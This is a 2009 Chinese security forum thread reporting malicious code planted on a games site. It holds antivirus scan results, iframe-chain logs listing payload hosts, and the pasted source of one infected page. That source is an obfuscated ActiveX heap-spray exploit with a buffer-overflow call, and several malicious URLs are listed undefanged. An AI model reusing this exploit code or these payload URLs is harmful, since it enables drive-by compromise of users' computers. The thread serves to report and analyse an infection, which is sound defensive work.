火狐游戏网[挂马]

显示全部楼层 · 发表于 2009-1-22 00:51:34

hxxp://go.keke02.cn/w04/new.html

[ 本帖最后由 dreams521 于 2009-1-22 00:57 编辑 ]

显示全部楼层 · 发表于 2009-1-22 07:32:13

畅游巡警扫描报告
扫描时间:2009年1月22日,7:31:13
畅游巡警网站扫描报告:

扫描时间:2009年1月22日,7:31:3

=============================

所在页面: http://go.keke02.cn/gword.htm

所在页面的位置: http://go.keke02.cn/w04/new.html

具体挂马地址: http://go.keke02.cn/gword.htm

扫描结果: Exploit.Win32.LianZhong.gen

=============================

所在页面: http://go.keke02.cn/baozi.htm

所在页面的位置: http://go.keke02.cn/w04/new.html

具体挂马地址: http://go.keke02.cn/baozi.htm

扫描结果: Trojan-Downloader.JS.Confusion.e

=============================

所在页面: http://go.keke02.cn/w04/for.htm

所在页面的位置: http://go.keke02.cn/w04/new.html

具体挂马地址: http://go.keke02.cn/w04/for.htm

扫描结果: Trojan-Downloader.JS.Confusion.g

=============================

所在页面: http://go.keke02.cn/all10.htm

所在页面的位置: http://go.keke02.cn/w04/new.html

具体挂马地址: http://go.keke02.cn/all10.htm

扫描结果: Exploit.Win32.Realplayer.gen

显示全部楼层 · 发表于 2009-1-22 09:01:01

Log is generated by FreShow.
[wide]http://go.keke02.cn/w04/new.html
[frame]http://go.keke02.cn/w04/for.htm
      [object]http://wwww.ttfabb.com/w04.css
[frame]http://go.keke02.cn/w04/../baozi.htm
      [object]http://wwww.ttfafb.com/wl.css
[frame]http://go.keke02.cn/w04/../gword.htm
      [script]http://go.keke02.cn/w04/../HOHOGL.js
         [object]http://wwww.ttfabb.com/wl.css
[frame]http://go.keke02.cn/w04/../all10.htm
      [object]http://wwww.ttfabb.com/wl.css
[frame]http://go.keke02.cn/w04/../all11.htm
      [script]http://go.keke02.cn/w04/../realdadong.js
         [object]http://wwww.ttfabb.com/wl.css
[frame]http://go.keke02.cn/w04/fx.htm
      [frame]http://go.keke02.cn/w04/mlink.html
         [script]http://go.keke02.cn/w04/swfobject.js
      [frame]http://go.keke02.cn/w04/xlink.html
         [script]http://go.keke02.cn/w04/swfobject.js
[frame]http://go.keke02.cn/w04/../supp.htm
      [object]http://wwww.ttfafb.com/wl.css

显示全部楼层 · 发表于 2009-1-22 09:36:58

RIS 2009
访问地址：http://go.keke02.cn/supp.htm
访问网页的进程："C:\Program Files\Internet Explorer\iexplore.exe"
病毒名称：Suspicious.Trojan-Downloader.Unescape.ShellCode.b

显示全部楼层 · 发表于 2009-1-22 21:45:40

卡8脚本启发

无法获取请求的网址

试图获取的网址（URL）:

http://go.keke02.cn/w04/new.html

包含下列错误:

请求的对象已被感染下列病毒:
HEUR:Trojan-Downloader.Script.Generic

如果您对此有疑问，请与您的服务提供商进行联系。
发生于:
Thu Jan 22 21:43:57 2009
Kaspersky Internet Security 2009

显示全部楼层 · 发表于 2009-1-22 22:50:27

Log is generated by FreShow.
[wide]http://go.keke02.cn/w04/new.html
[object]http://wwww.ttfabb.com/Baidu.cab
[frame]http://go.keke02.cn/w04/for.htm
[frame]http://go.keke02.cn/w04/../baozi.htm
[frame]http://go.keke02.cn/w04/../gword.htm
[frame]http://go.keke02.cn/w04/../all10.htm
[frame]http://go.keke02.cn/w04/../all11.htm
[frame]http://go.keke02.cn/w04/fx.htm
[frame]http://go.keke02.cn/w04/../supp.htm

显示全部楼层 · 发表于 2009-1-23 01:19:48

想問這個怎解hxxp://go.keke02.cn/w04/../supp.htm

<html>
<script>window.onerror=function(){return true;}</script>
<script src=cx.js></script>
<object classid="clsi"+"d:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='pkpkhuoche'></object>
<SCRIPT language="javascript">
huochecodede=huoche16+huoche16+huoche0+huoche+huoche1+huoche2+huoche3+huoche4+huoche5+huoche6+huoche7+huoche8+huoche9+huoche10+huoche11+huoche12+huoche99+huoche13+huoche14+huoche15;
var pkblack = huoche16+huoche16;
var headhuoche = 20;
var r="r";
var rr="rr";
var pkjuhuoche = headhuoche+huochecodede.length;
while (pkblack.length<pkjuhuoche) pkblack+=pkblack;
fillhuoche = pkblack.substring(0, pkjuhuoche);
codejuhuoche = pkblack.substring(0, pkblack.length-pkjuhuoche);
while(codejuhuoche.length+pkjuhuoche<0x40000) codejuhuoche = codejuhuoche+codejuhuoche+fillhuoche;
modehuoche = new Array();
for (x=0; x<300; x++) modehuoche[x] = codejuhuoche + huochecodede;
var buffer = '';
while (buffer.length < 3092) buffer+="\x0a\x0a\x0a\x0a";
pkpkhuoche.LoadPage(buffer ,1 ,1 ,1);
</script>
</html>

[其它] 火狐游戏网[挂马]

评分

回复 3楼於陵闲云的帖子

[其它] 火狐游戏网[挂马]

评分

回复 3楼 於陵闲云 的帖子

回复 3楼於陵闲云的帖子